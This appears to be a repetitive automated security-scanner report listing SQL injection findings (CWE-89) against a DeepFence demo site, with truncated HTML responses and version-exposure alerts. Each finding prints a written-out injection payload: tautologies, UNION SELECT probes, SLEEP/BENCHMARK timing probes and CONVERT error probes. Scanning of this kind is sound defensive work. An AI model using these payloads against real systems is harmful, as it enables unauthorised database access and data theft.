href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #383\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" or \"\"^\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #384\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \" or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #385\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #386\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #387\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4,5,6,7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #388\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #389\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1' ORDER BY 1,2--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #390\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #391Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io-- or #\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #392\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88\n)+CHAR(88)+CHAR(88)+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #393\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #394\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(\n88)+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #395\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #396\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin'/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 